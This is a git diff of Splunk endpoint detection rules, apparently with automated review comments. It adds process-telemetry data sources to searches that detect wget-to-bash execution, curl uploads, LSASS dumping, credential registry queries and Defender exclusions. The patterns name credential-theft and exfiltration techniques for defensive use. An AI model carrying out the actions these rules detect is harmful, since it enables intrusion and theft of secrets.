data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.parent_process) as parent_process values(Processes.process_id)
as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/w3wp_spawning_shell.yml b/detections/endpoint/w3wp_spawning_shell.yml
index 52aebab2b1..5ca141c849 100644
--- a/detections/endpoint/w3wp_spawning_shell.yml
+++ b/detections/endpoint/w3wp_spawning_shell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where a shell (PowerShe
compromise, data exfiltration, or further lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=w3wp.exe
diff --git a/detections/endpoint/wbadmin_delete_system_backups.yml b/detections/endpoint/wbadmin_delete_system_backups.yml
index 80c1d088b1..1650bd43c0 100644
--- a/detections/endpoint/wbadmin_delete_system_backups.yml
+++ b/detections/endpoint/wbadmin_delete_system_backups.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of wbadmin.exe with fl
to prolonged downtime and potential data loss.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wbadmin.exe
Processes.process="*delete*" AND (Processes.process="*catalog*" OR Processes.process="*systemstatebackup*")
diff --git a/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml b/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml
index df44295542..1309486162 100644
--- a/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml
+++ b/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the spawning of cmd or PowerShell pr
environment, posing a severe threat to system security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as cmdline
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.parent_process_name = "wermgr.exe" `process_cmd` OR `process_powershell`
diff --git a/detections/endpoint/wget_download_and_bash_execution.yml b/detections/endpoint/wget_download_and_bash_execution.yml
index 5284757eb7..cc8783ec62 100644
--- a/detections/endpoint/wget_download_and_bash_execution.yml
+++ b/detections/endpoint/wget_download_and_bash_execution.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of wget on Linux or MacOS to
leading to system compromise and unauthorized access to sensitive data.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wget
(Processes.process="*-q *" OR Processes.process="*--quiet*" AND Processes.process="*-O-
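Review bot: `Windows Event Log Security 4688` cannot be a source for this detection: the hunk header describes wget on Linux or MacOS and the search matches `Processes.process_name=wget`, while Security 4688 is only emitted by Windows hosts. The Windows entry looks like a bulk edit applied to every Sysmon-EventID-1 detection without checking the platform; keep `- CrowdStrike ProcessRollup2` if the Falcon sensor on Linux/macOS is meant to be covered and drop the `- Windows Event Log Security 4688` line. The search's boolean expression continues past the hunk.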
diff --git a/detections/endpoint/windows_ad_dsrm_account_changes.yml b/detections/endpoint/windows_ad_dsrm_account_changes.yml
index 6d87eae63b..2e7df399df 100644
--- a/detections/endpoint/windows_ad_dsrm_account_changes.yml
+++ b/detections/endpoint/windows_ad_dsrm_account_changes.yml
@@ -6,8 +6,8 @@ author: Dean Luxton
type: TTP
status: production
data_source:
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
description: The following analytic identifies changes to the Directory Services Restore
Mode (DSRM) account behavior via registry modifications. It detects alterations
in the registry path "*\\System\\CurrentControlSet\\Control\\Lsa\\DSRMAdminLogonBehavior"
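Review bot: The replacement entries `- Sysmon EventID 1 AND Sysmon EventID 12` and `- Sysmon EventID 1 AND Sysmon EventID 13` pack two sources into one list item, whereas every other `data_source` hunk in this diff (windows_defender_exclusion_registry_entry, windows_disable_memory_crash_dump, for example) keeps one source per item; the same compound form is introduced in windows_deleted_registry_by_a_non_critical_process_file_path. If contentctl resolves each entry against the data_sources catalog, these strings need matching catalog entries or validation will presumably fail. If the intent is that this Registry-datamodel search also depends on process telemetry for process-GUID correlation, listing `- Sysmon EventID 1` as its own item expresses that without inventing a compound name. The search for this detection is outside the hunk.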
diff --git a/detections/endpoint/windows_adfind_exe.yml b/detections/endpoint/windows_adfind_exe.yml
index e23d9c6d48..396269cb15 100644
--- a/detections/endpoint/windows_adfind_exe.yml
+++ b/detections/endpoint/windows_adfind_exe.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the execution of `adfind.exe` wi
privilege escalation or lateral movement.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process="* -f *"
OR Processes.process="* -b *") AND (Processes.process=*objectcategory* OR Processes.process="*
diff --git a/detections/endpoint/windows_alternate_datastream___base64_content.yml b/detections/endpoint/windows_alternate_datastream___base64_content.yml
index 9bf07cecb7..5367f1dac7 100644
--- a/detections/endpoint/windows_alternate_datastream___base64_content.yml
+++ b/detections/endpoint/windows_alternate_datastream___base64_content.yml
@@ -6,7 +6,7 @@ author: Steven Dick, Teoderick Contreras, Michael Haag, Splunk
status: production
type: TTP
description: The following analytic detects the creation of Alternate Data Streams
- (ADS) with Base64 content on Windows systems. It leverages Sysmon Event ID 15, which
+ (ADS) with Base64 content on Windows systems. It leverages Sysmon EventID 15, which
captures file creation events, including the content of named streams. ADS can conceal
malicious payloads, making them significant for SOC monitoring. This detection identifies
hidden streams that may contain executables, scripts, or configuration data, often
diff --git a/detections/endpoint/windows_apache_benchmark_binary.yml b/detections/endpoint/windows_apache_benchmark_binary.yml
index bf1478007b..99ff92162d 100644
--- a/detections/endpoint/windows_apache_benchmark_binary.yml
+++ b/detections/endpoint/windows_apache_benchmark_binary.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Apache Benchmar
is required to determine the intent and scope of the activity.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=ab.exe
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_archive_collected_data_via_rar.yml b/detections/endpoint/windows_archive_collected_data_via_rar.yml
index 52f7397116..7372166416 100644
--- a/detections/endpoint/windows_archive_collected_data_via_rar.yml
+++ b/detections/endpoint/windows_archive_collected_data_via_rar.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the execution of RAR utilities to archive
files on a system. It leverages data from Endpoint Detection and Response (EDR)
agents, focusing on process names, GUIDs, and command-line arguments. This activity
diff --git a/detections/endpoint/windows_autoit3_execution.yml b/detections/endpoint/windows_autoit3_execution.yml
index 226da555e3..8b6a637a9d 100644
--- a/detections/endpoint/windows_autoit3_execution.yml
+++ b/detections/endpoint/windows_autoit3_execution.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of AutoIt3, a scripting
language often used for automating Windows GUI tasks and general scripting. It identifies
instances where AutoIt3 or its variants are executed by searching for process names
diff --git a/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml b/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml
index c3c0f33fdc..16e498f509 100644
--- a/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml
+++ b/detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to undocumented regist
malicious, this could allow attackers to gain unauthorized access to sensitive information
and escalate privileges within the environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","*\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt")
diff --git a/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml b/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml
index 2f14bd3f8a..2c897efca7 100644
--- a/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml
+++ b/detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of mavinject.exe for DLL inj
persistence within the environment, posing a severe security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mavinject.exe
Processes.process IN ("*injectrunning*", "*hmodule=0x*") by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml b/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml
index baaaa620e6..3fc287e4ba 100644
--- a/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml
+++ b/detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of the deprecated 'pkgmgr.exe'
process with an XML input file, which is unusual and potentially suspicious. This
detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on
diff --git a/detections/endpoint/windows_cached_domain_credentials_reg_query.yml b/detections/endpoint/windows_cached_domain_credentials_reg_query.yml
index c1be8ead59..7978a53dcf 100644
--- a/detections/endpoint/windows_cached_domain_credentials_reg_query.yml
+++ b/detections/endpoint/windows_cached_domain_credentials_reg_query.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a process command line querying t
or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process
= "* query *" AND Processes.process = "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*"
diff --git a/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml b/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml
index 5b487622a8..b2183ba46f 100644
--- a/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml
+++ b/detections/endpoint/windows_change_default_file_association_for_no_file_ext.yml
@@ -15,6 +15,8 @@ description: The following analytic detects attempts to change the default file
to system compromise or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process="*
add *" AND Processes.process="* HKCR\\*" AND Processes.process="*\\shell\\open\\command*"
diff --git a/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml b/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml
index 0dca0667c7..55eaacf00d 100644
--- a/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml
+++ b/detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of the InProcServer
access to the compromised environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` Processes.process=*inprocserver32*
by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml b/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml
index bae81a6e17..80cf509cd0 100644
--- a/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml
+++ b/detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies path traversal command-line execu
movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes by Processes.original_file_name Processes.process_id
Processes.parent_process_id Processes.process_hash Processes.dest Processes.user
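Review bot: The `by` clause on the last visible line splits on `Processes.process_hash`, a field Security 4688 events do not carry (4688 records the image path and process IDs, not a hash), and tstats excludes events whose split-by field is null, so the newly listed `Windows Event Log Security 4688` source will contribute no rows to this hunt. Either take the hash out of the split-by and collect it later with `values(Processes.process_hash)`, or leave the list as Sysmon EventID 1 and CrowdStrike ProcessRollup2, both of which populate a hash. The search continues past the hunk, so a later filter may also depend on the hash.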
diff --git a/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml b/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml
index 5158e43544..0fc8280bc9 100644
--- a/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml
+++ b/detections/endpoint/windows_command_and_scripting_interpreter_path_traversal_exec.yml
@@ -15,6 +15,8 @@ description: The following analytic detects path traversal command-line executio
other living-off-the-land binaries (LOLBins).
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where Processes.process="*\/..\/..\/..\/*"
OR Processes.process="*\\..\\..\\..\\*" OR Processes.process="*\/\/..\/\/..\/\/..\/\/*"
diff --git a/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml b/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml
index 3c450a831b..e8e2f0e169 100644
--- a/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml
+++ b/detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a DCRat "forkbomb"
disruption of services.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.parent_process) as parent_process values(Processes.parent_process_id)
as parent_process_id values(Processes.process_id) as process_id dc(Processes.parent_process_id)
diff --git a/detections/endpoint/windows_command_shell_fetch_env_variables.yml b/detections/endpoint/windows_command_shell_fetch_env_variables.yml
index 657cb15392..5dba1abde8 100644
--- a/detections/endpoint/windows_command_shell_fetch_env_variables.yml
+++ b/detections/endpoint/windows_command_shell_fetch_env_variables.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a suspicious process command line
or persist within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "*cmd /c
set" OR Processes.process = "*cmd.exe /c set" AND NOT (Processes.parent_process_name
diff --git a/detections/endpoint/windows_conhost_with_headless_argument.yml b/detections/endpoint/windows_conhost_with_headless_argument.yml
index 3c99f93275..cc79f44408 100644
--- a/detections/endpoint/windows_conhost_with_headless_argument.yml
+++ b/detections/endpoint/windows_conhost_with_headless_argument.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: 'The following analytic detects the unusual invocation of the Windows
Console Host process (conhost.exe) with the undocumented --headless parameter. This
detection leverages Endpoint Detection and Response (EDR) telemetry, specifically
diff --git a/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml b/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml
index 81aa7093f0..fe68d9e5c1 100644
--- a/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml
+++ b/detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of CreateDump.exe to perform
this could lead to unauthorized access and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=createdump.exe
OR Processes.original_file_name="FX_VER_INTERNALNAME_STR" Processes.process="*-u
diff --git a/detections/endpoint/windows_credentials_from_password_stores_creation.yml b/detections/endpoint/windows_credentials_from_password_stores_creation.yml
index ee120e6d34..ecef8bec4a 100644
--- a/detections/endpoint/windows_credentials_from_password_stores_creation.yml
+++ b/detections/endpoint/windows_credentials_from_password_stores_creation.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of the Windows OS tool cmdkey.exe,
which is used to create stored usernames, passwords, or credentials. This detection
leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
diff --git a/detections/endpoint/windows_credentials_from_password_stores_deletion.yml b/detections/endpoint/windows_credentials_from_password_stores_deletion.yml
index 756e14a4d0..8a95cf7a02 100644
--- a/detections/endpoint/windows_credentials_from_password_stores_deletion.yml
+++ b/detections/endpoint/windows_credentials_from_password_stores_deletion.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of the Windows OS tool cmdkey.exe
with the /delete parameter. This detection leverages data from Endpoint Detection
and Response (EDR) agents, focusing on process execution logs and command-line arguments.
diff --git a/detections/endpoint/windows_credentials_from_password_stores_query.yml b/detections/endpoint/windows_credentials_from_password_stores_query.yml
index 085ac15b7f..03147e0096 100644
--- a/detections/endpoint/windows_credentials_from_password_stores_query.yml
+++ b/detections/endpoint/windows_credentials_from_password_stores_query.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Windows OS tool
maintain control over compromised systems for further exploitation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name="cmdkey.exe"
OR Processes.original_file_name = "cmdkey.exe" AND Processes.process = "*/list*"
diff --git a/detections/endpoint/windows_credentials_in_registry_reg_query.yml b/detections/endpoint/windows_credentials_in_registry_reg_query.yml
index 206d4627e5..f2d7b84ded 100644
--- a/detections/endpoint/windows_credentials_in_registry_reg_query.yml
+++ b/detections/endpoint/windows_credentials_in_registry_reg_query.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes querying the registry f
security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process
= "* query *" AND Processes.process IN ("*\\Software\\ORL\\WinVNC3\\Password*",
diff --git a/detections/endpoint/windows_curl_download_to_suspicious_path.yml b/detections/endpoint/windows_curl_download_to_suspicious_path.yml
index 7b943a9259..9665d8ddb2 100644
--- a/detections/endpoint/windows_curl_download_to_suspicious_path.yml
+++ b/detections/endpoint/windows_curl_download_to_suspicious_path.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of Windows Curl.exe to down
compromise of the system.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process
IN ("*-O *","*--output*") Processes.process IN ("*\\appdata\\*","*\\programdata\\*","*\\public\\*")
diff --git a/detections/endpoint/windows_curl_upload_to_remote_destination.yml b/detections/endpoint/windows_curl_upload_to_remote_destination.yml
index 3c5a338023..beba138a0c 100644
--- a/detections/endpoint/windows_curl_upload_to_remote_destination.yml
+++ b/detections/endpoint/windows_curl_upload_to_remote_destination.yml
@@ -14,6 +14,8 @@ description: 'The following analytic detects the use of Windows Curl.exe to uplo
if the upload was successful and isolate the endpoint if necessary.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_curl` Processes.process
IN ("*-T *","*--upload-file *", "*-d *", "*--data *", "*-F *") by Processes.dest
diff --git a/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml b/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml
index 4d56e2db30..ab05fafed6 100644
--- a/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml
+++ b/detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies modifications to the TranscodedWa
potentially leading to further system compromise or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_path !="*\\Windows\\Explorer.EXE" by _time span=1h Processes.process_id
Processes.process_name Processes.process Processes.dest Processes.process_guid Processes.original_file_name
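Review bot: `Processes.process_guid` in the `by` clause has no counterpart in Security 4688, which supplies process IDs rather than a GUID, so with tstats excluding events where a split-by field is null the new `Windows Event Log Security 4688` entry advertises coverage this search will not return. windows_archive_collected_data_via_rar gains the same entry while its description says the analytic focuses on "process names, GUIDs" (its search is outside that hunk), so it likely has the same gap. Either remove the 4688 entry from GUID-dependent searches or restructure the split-by so the GUID is not a required grouping key. The search continues past the hunk.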
diff --git a/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml b/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml
index 8899947e04..9fced33409 100644
--- a/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml
+++ b/detections/endpoint/windows_default_group_policy_object_modified_with_gpme.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects modifications to default Group Policy
Objects (GPOs) using the Group Policy Management Editor (GPME). It leverages the
Endpoint data model to identify processes where `mmc.exe` executes `gpme.msc` with
diff --git a/detections/endpoint/windows_defender_exclusion_registry_entry.yml b/detections/endpoint/windows_defender_exclusion_registry_entry.yml
index bd11dc18c9..f2c43428c9 100644
--- a/detections/endpoint/windows_defender_exclusion_registry_entry.yml
+++ b/detections/endpoint/windows_defender_exclusion_registry_entry.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications to the Windows Defende
malicious, this behavior could enable attackers to evade antivirus defenses, maintain
persistence, and execute further malicious activities undetected.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path = "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\*")
diff --git a/detections/endpoint/windows_delete_or_modify_system_firewall.yml b/detections/endpoint/windows_delete_or_modify_system_firewall.yml
index aa99fe8e6f..cb4428c52e 100644
--- a/detections/endpoint/windows_delete_or_modify_system_firewall.yml
+++ b/detections/endpoint/windows_delete_or_modify_system_firewall.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies 'netsh' processes that delete or modify
firewall configurations. It leverages data from Endpoint Detection and Response
(EDR) agents, focusing on command-line executions containing specific keywords.
diff --git a/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml b/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml
index f681d34702..1cb171f835 100644
--- a/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml
+++ b/detections/endpoint/windows_deleted_registry_by_a_non_critical_process_file_path.yml
@@ -13,8 +13,8 @@ description: The following analytic detects the deletion of registry keys by non
payload impacts. If confirmed malicious, this behavior could lead to significant
system damage, loss of critical configurations, and potential disruption of services.
data_source:
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
WHERE Registry.action=deleted BY _time span=1h Registry.dest Registry.registry_path
Registry.registry_value_name Registry.registry_key_name Registry.process_guid Registry.registry_value_data
diff --git a/detections/endpoint/windows_disable_change_password_through_registry.yml b/detections/endpoint/windows_disable_change_password_through_registry.yml
index c561835edc..76ee500f88 100644
--- a/detections/endpoint/windows_disable_change_password_through_registry.yml
+++ b/detections/endpoint/windows_disable_change_password_through_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a suspicious registry modification t
to an attack, allowing the attacker to persist and potentially escalate their access
within the network.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword"
diff --git a/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml b/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml
index 24eb798ef3..b74c266c1f 100644
--- a/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml
+++ b/detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a suspicious registry modification t
allow attackers to sustain their presence and execute further malicious actions
without user interruption.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation"
diff --git a/detections/endpoint/windows_disable_logoff_button_through_registry.yml b/detections/endpoint/windows_disable_logoff_button_through_registry.yml
index 62e6d17639..c1fb076d93 100644
--- a/detections/endpoint/windows_disable_logoff_button_through_registry.yml
+++ b/detections/endpoint/windows_disable_logoff_button_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification t
response, and allow attackers to maintain persistence and control over the affected
system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*"
diff --git a/detections/endpoint/windows_disable_memory_crash_dump.yml b/detections/endpoint/windows_disable_memory_crash_dump.yml
index e587837d60..1a51b92dff 100644
--- a/detections/endpoint/windows_disable_memory_crash_dump.yml
+++ b/detections/endpoint/windows_disable_memory_crash_dump.yml
@@ -14,7 +14,7 @@ description: The following analytic detects attempts to disable the memory crash
as seen with HermeticWiper, potentially leading to significant operational disruptions
and data loss.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
where (Registry.registry_path="*\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled")
diff --git a/detections/endpoint/windows_disable_notification_center.yml b/detections/endpoint/windows_disable_notification_center.yml
index 45cef9986b..d0cdee55a5 100644
--- a/detections/endpoint/windows_disable_notification_center.yml
+++ b/detections/endpoint/windows_disable_notification_center.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the modification of the Windows regi
and subsequent actions. If confirmed malicious, this could allow an attacker to
operate stealthily, potentially leading to further system compromise and data exfiltration.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_value_name= "DisableNotificationCenter" Registry.registry_value_data
diff --git a/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml b/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml
index 762b4cfe59..e35d798836 100644
--- a/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml
+++ b/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the use of taskkill.exe to forcibly
terminate processes. It leverages data from Endpoint Detection and Response (EDR)
agents, focusing on command-line executions that include specific taskkill parameters.
